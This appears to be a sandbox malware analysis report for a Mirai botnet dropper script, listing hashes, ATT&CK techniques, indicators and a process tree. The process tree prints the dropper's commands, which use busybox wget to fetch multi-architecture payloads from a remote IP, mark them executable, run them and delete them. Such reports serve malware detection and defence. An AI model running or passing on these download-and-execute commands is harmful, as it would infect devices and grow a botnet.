mirai | 51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a

Analysis

max time kernel
138s
max time network
162s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
08/03/2025, 07:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
Size

1KB
MD5

a9f753da46e0678e9652f1417378e79a
SHA1

19bf100cae7a6a8fa9a42d0368ff1918c9b796ac
SHA256

51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a
SHA512

3969653a243f80154bbca0045c35e3e8e0b47fdc85bcc13c8887c24e2c207dfd92e3265393ea7d8a28347c67d69501a0d7a2aa2247e116a0705d33731bdce636

Score

10^/10

mirai botnet botnet credential_access defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (140863) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 12 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
725	busybox
734	busybox
710	busybox
715	busybox
730	busybox
739	busybox
744	busybox
749	busybox
662	busybox
675	busybox
704	busybox
720	busybox

Executes dropped EXE 3 IoCs

ioc	pid	Process
/tmp/jklarm	664	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/jklarm5	677	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/jklarm6	705	51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	jklarm
File opened for modification	/dev/misc/watchdog	jklarm
File opened for modification	/dev/watchdog	jklarm5
File opened for modification	/dev/misc/watchdog	jklarm5

Renames itself 2 IoCs

pid	Process
664	jklarm
677	jklarm5

Unexpected DNS network traffic destination 2 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	152.53.15.127
Destination IP	185.181.61.24

Enumerates active TCP sockets 1 TTPs 2 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	jklarm
File opened for reading	/proc/net/tcp	jklarm5

Enumerates running processes
Discovers information about currently running processes on the system

Reads process memory 1 TTPs 64 IoCs

Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

credential_access

Proc Filesystem

T1003.007

description	ioc	Process
File opened for reading	/proc/773/maps	jklarm5
File opened for reading	/proc/800/maps	jklarm5
File opened for reading	/proc/812/maps	jklarm5
File opened for reading	/proc/825/maps	jklarm5
File opened for reading	/proc/728/maps	jklarm5
File opened for reading	/proc/738/maps	jklarm5
File opened for reading	/proc/799/maps	jklarm5
File opened for reading	/proc/802/maps	jklarm5
File opened for reading	/proc/805/maps	jklarm5
File opened for reading	/proc/821/maps	jklarm5
File opened for reading	/proc/770/maps	jklarm5
File opened for reading	/proc/724/maps	jklarm5
File opened for reading	/proc/729/maps	jklarm5
File opened for reading	/proc/734/maps	jklarm5
File opened for reading	/proc/757/maps	jklarm5
File opened for reading	/proc/789/maps	jklarm5
File opened for reading	/proc/798/maps	jklarm5
File opened for reading	/proc/813/maps	jklarm5
File opened for reading	/proc/713/maps	jklarm5
File opened for reading	/proc/720/maps	jklarm5
File opened for reading	/proc/752/maps	jklarm5
File opened for reading	/proc/762/maps	jklarm5
File opened for reading	/proc/774/maps	jklarm5
File opened for reading	/proc/790/maps	jklarm5
File opened for reading	/proc/792/maps	jklarm5
File opened for reading	/proc/816/maps	jklarm5
File opened for reading	/proc/710/maps	jklarm5
File opened for reading	/proc/715/maps	jklarm5
File opened for reading	/proc/732/maps	jklarm5
File opened for reading	/proc/736/maps	jklarm5
File opened for reading	/proc/741/maps	jklarm5
File opened for reading	/proc/764/maps	jklarm5
File opened for reading	/proc/766/maps	jklarm5
File opened for reading	/proc/778/maps	jklarm5
File opened for reading	/proc/755/maps	jklarm5
File opened for reading	/proc/804/maps	jklarm5
File opened for reading	/proc/817/maps	jklarm5
File opened for reading	/proc/818/maps	jklarm5
File opened for reading	/proc/826/maps	jklarm5
File opened for reading	/proc/827/maps	jklarm5
File opened for reading	/proc/829/maps	jklarm5
File opened for reading	/proc/781/maps	jklarm5
File opened for reading	/proc/786/maps	jklarm5
File opened for reading	/proc/793/maps	jklarm5
File opened for reading	/proc/794/maps	jklarm5
File opened for reading	/proc/832/maps	jklarm5
File opened for reading	/proc/833/maps	jklarm5
File opened for reading	/proc/718/maps	jklarm5
File opened for reading	/proc/744/maps	jklarm5
File opened for reading	/proc/761/maps	jklarm5
File opened for reading	/proc/820/maps	jklarm5
File opened for reading	/proc/747/maps	jklarm5
File opened for reading	/proc/763/maps	jklarm5
File opened for reading	/proc/767/maps	jklarm5
File opened for reading	/proc/777/maps	jklarm5
File opened for reading	/proc/815/maps	jklarm5
File opened for reading	/proc/822/maps	jklarm5
File opened for reading	/proc/823/maps	jklarm5
File opened for reading	/proc/830/maps	jklarm5
File opened for reading	/proc/709/maps	jklarm5
File opened for reading	/proc/719/maps	jklarm5
File opened for reading	/proc/772/maps	jklarm5
File opened for reading	/proc/828/maps	jklarm5
File opened for reading	/proc/831/maps	jklarm5

Changes its process name 2 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	login	664	jklarm
Changes the process name, possibly in an attempt to hide itself	bash	677	jklarm5

Reads system network configuration 1 TTPs 2 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	jklarm
File opened for reading	/proc/net/tcp	jklarm5

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/17/comm	jklarm
File opened for reading	/proc/5/comm	jklarm5
File opened for reading	/proc/9/comm	jklarm5
File opened for reading	/proc/710/cmdline	jklarm5
File opened for reading	/proc/781/cmdline	jklarm5
File opened for reading	/proc/8/comm	jklarm5
File opened for reading	/proc/718/cmdline	jklarm5
File opened for reading	/proc/732/cmdline	jklarm5
File opened for reading	/proc/767/cmdline	jklarm5
File opened for reading	/proc/13/comm	jklarm
File opened for reading	/proc/7/comm	jklarm
File opened for reading	/proc/11/comm	jklarm5
File opened for reading	/proc/136/comm	jklarm5
File opened for reading	/proc/280/comm	jklarm5
File opened for reading	/proc/737/cmdline	jklarm5
File opened for reading	/proc/782/cmdline	jklarm5
File opened for reading	/proc/806/cmdline	jklarm5
File opened for reading	/proc/265/status	jklarm
File opened for reading	/proc/637/status	jklarm
File opened for reading	/proc/271/status	jklarm5
File opened for reading	/proc/761/cmdline	jklarm5
File opened for reading	/proc/777/cmdline	jklarm5
File opened for reading	/proc/828/cmdline	jklarm5
File opened for reading	/proc/24/comm	jklarm
File opened for reading	/proc/296/status	jklarm
File opened for reading	/proc/394/status	jklarm
File opened for reading	/proc/22/comm	jklarm5
File opened for reading	/proc/638/comm	jklarm5
File opened for reading	/proc/458/status	jklarm5
File opened for reading	/proc/815/cmdline	jklarm5
File opened for reading	/proc/832/cmdline	jklarm5
File opened for reading	/proc/14/comm	jklarm
File opened for reading	/proc/599/status	jklarm
File opened for reading	/proc/267/status	jklarm5
File opened for reading	/proc/269/comm	jklarm
File opened for reading	/proc/643/comm	jklarm
File opened for reading	/proc/644/comm	jklarm
File opened for reading	/proc/647/status	jklarm
File opened for reading	/proc/139/comm	jklarm5
File opened for reading	/proc/765/cmdline	jklarm5
File opened for reading	/proc/11/comm	jklarm
File opened for reading	/proc/16/comm	jklarm
File opened for reading	/proc/642/comm	jklarm
File opened for reading	/proc/728/cmdline	jklarm5
File opened for reading	/proc/457/comm	jklarm
File opened for reading	/proc/19/comm	jklarm
File opened for reading	/proc/139/comm	jklarm
File opened for reading	/proc/146/comm	jklarm
File opened for reading	/proc/647/status	jklarm5
File opened for reading	/proc/742/cmdline	jklarm5
File opened for reading	/proc/4/comm	jklarm
File opened for reading	/proc/22/comm	jklarm
File opened for reading	/proc/28/comm	jklarm
File opened for reading	/proc/25/comm	jklarm5
File opened for reading	/proc/self/maps	jklarm5
File opened for reading	/proc/744/cmdline	jklarm5
File opened for reading	/proc/774/cmdline	jklarm5
File opened for reading	/proc/813/cmdline	jklarm5
File opened for reading	/proc/212/comm	jklarm
File opened for reading	/proc/27/comm	jklarm5
File opened for reading	/proc/271/comm	jklarm5
File opened for reading	/proc/713/cmdline	jklarm5
File opened for reading	/proc/743/cmdline	jklarm5
File opened for reading	/proc/829/cmdline	jklarm5

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
719	busybox
721	jklmips
722	busybox

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jklarm	busybox
File opened for modification	/tmp/jklarm5	busybox
File opened for modification	/tmp/jklarm6	busybox

/tmp/51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
/tmp/51b1d643a14b5c081b4a836bb80812e7866811ab8f90cf8ace4744565408d16a.sh
1⤵
- Executes dropped EXE
PID:645
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
  2⤵
  - Writes file to tmp directory
  PID:646
- /bin/busybox
  /bin/busybox chmod +x jklarm
  2⤵
  - File and Directory Permissions Modification
  PID:662
- /tmp/jklarm
  ./jklarm exploit
  2⤵
  - Modifies Watchdog functionality
  - Renames itself
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:664
- /bin/busybox
  /bin/busybox rm -rf jklarm
  2⤵
  PID:667
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
  2⤵
  - Writes file to tmp directory
  PID:670
- /bin/busybox
  /bin/busybox chmod +x jklarm5
  2⤵
  - File and Directory Permissions Modification
  PID:675
- /tmp/jklarm5
  ./jklarm5 exploit
  2⤵
  - Modifies Watchdog functionality
  - Renames itself
  - Enumerates active TCP sockets
  - Reads process memory
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:677
- /bin/busybox
  /bin/busybox rm -rf jklarm5
  2⤵
  PID:698
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
  2⤵
  - Writes file to tmp directory
  PID:701
- /bin/busybox
  /bin/busybox chmod +x jklarm6
  2⤵
  - File and Directory Permissions Modification
  PID:704
- /tmp/jklarm6
  ./jklarm6 exploit
  2⤵
  PID:705
- /bin/busybox
  /bin/busybox rm -rf jklarm6
  2⤵
  PID:706
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
  2⤵
  PID:709
- /bin/busybox
  /bin/busybox chmod +x jklarm7
  2⤵
  - File and Directory Permissions Modification
  PID:710
- /tmp/jklarm7
  ./jklarm7 exploit
  2⤵
  PID:711
- /bin/busybox
  /bin/busybox rm -rf jklarm7
  2⤵
  PID:713
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
  2⤵
  PID:714
- /bin/busybox
  /bin/busybox chmod +x jklm68k
  2⤵
  - File and Directory Permissions Modification
  PID:715
- /tmp/jklm68k
  ./jklm68k exploit
  2⤵
  PID:716
- /bin/busybox
  /bin/busybox rm -rf jklm68k
  2⤵
  PID:717
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmips -O jklmips
  2⤵
  - System Network Configuration Discovery
  PID:719
- /bin/busybox
  /bin/busybox chmod +x jklmips
  2⤵
  - File and Directory Permissions Modification
  PID:720
- /tmp/jklmips
  ./jklmips exploit
  2⤵
  - System Network Configuration Discovery
  PID:721
- /bin/busybox
  /bin/busybox rm -rf jklmips
  2⤵
  - System Network Configuration Discovery
  PID:722
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl
  2⤵
  PID:723
- /bin/busybox
  /bin/busybox chmod +x jklmpsl
  2⤵
  - File and Directory Permissions Modification
  PID:725
- /tmp/jklmpsl
  ./jklmpsl exploit
  2⤵
  PID:726
- /bin/busybox
  /bin/busybox rm -rf jklmpsl
  2⤵
  PID:727
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklppc -O jklppc
  2⤵
  PID:728
- /bin/busybox
  /bin/busybox chmod +x jklppc
  2⤵
  - File and Directory Permissions Modification
  PID:730
- /tmp/jklppc
  ./jklppc exploit
  2⤵
  PID:731
- /bin/busybox
  /bin/busybox rm -rf jklppc
  2⤵
  PID:732
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh4
  2⤵
  PID:733
- /bin/busybox
  /bin/busybox chmod +x jklsh4
  2⤵
  - File and Directory Permissions Modification
  PID:734
- /tmp/jklsh4
  ./jklsh4 exploit
  2⤵
  PID:735
- /bin/busybox
  /bin/busybox rm -rf jklsh4
  2⤵
  PID:737
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklspc -O jklspc
  2⤵
  PID:738
- /bin/busybox
  /bin/busybox chmod +x jklspc
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/jklspc
  ./jklspc exploit
  2⤵
  PID:740
- /bin/busybox
  /bin/busybox rm -rf jklspc
  2⤵
  PID:741
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklx86 -O jklx86
  2⤵
  PID:743
- /bin/busybox
  /bin/busybox chmod +x jklx86
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/jklx86
  ./jklx86 exploit
  2⤵
  PID:745
- /bin/busybox
  /bin/busybox rm -rf jklx86
  2⤵
  PID:746
- /bin/busybox
  /bin/busybox wget http://176.65.134.5/jklarc -O jklarc
  2⤵
  PID:747
- /bin/busybox
  /bin/busybox chmod +x jklarc
  2⤵
  - File and Directory Permissions Modification
  PID:749
- /tmp/jklarc
  ./jklarc exploit
  2⤵
  PID:750
- /bin/busybox
  /bin/busybox rm -rf jklarc
  2⤵
  PID:751
- /bin/busybox
  /bin/busybox rm -rf wget.sh
  2⤵
  PID:752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

OS Credential Dumping

T1003

Proc Filesystem

T1003.007

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jklarm

Filesize
55KB

MD5
847591420784f8bcc57bcf33d3f8e004

SHA1
f71e70254abfc295d9e6a352969172e06b6af496

SHA256
e7c7bf7f0aed9d07e10b900c9a8adc81983223967f409781520f9c9d1e5a36d6

SHA512
2da171c5e78f3e17195341577af0438266a25a59c64034736198bc1e9724c551f91e3da2335eb00b3a9b857407d94a69fb752a64c2e5edd05debb46546d73270

Download Submit
/tmp/jklarm5

Filesize
55KB

MD5
13646cedba2b07cac40f1722c5ef9bb1

SHA1
32ed76ad7e47f7919f7c8909321645cdcfeabe8b

SHA256
e2f8212e25b5c981e0be92428f013b289c4e2af6198d8414ed91c343ee1987df

SHA512
ce7bc090d5266283748f16be2b434a85a43ed5dff513d762653afc365872a360611fbd0dbfbce0628794d26e3a1a7a0a319c5039b74f74db7996acf5a864ed87

Download Submit
/tmp/jklarm6

Filesize
65KB

MD5
50bdc79e8119ec3deef4549fe78f959f

SHA1
b3898231d6b7d044566190bf2cbd04b1b20b7540

SHA256
cfee0df1ce4a388193fe3dd0dab48f4db9da05f67f7ccf0ba35fc8fcee38d397

SHA512
acb4a121ea03208cb12501aa332e4987841540a95703d7dac292fc766ed2b0b05e17343484c7c4a7d8c01d5952ea05b02964e72bf107f5fe0ffe51522f01875b

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads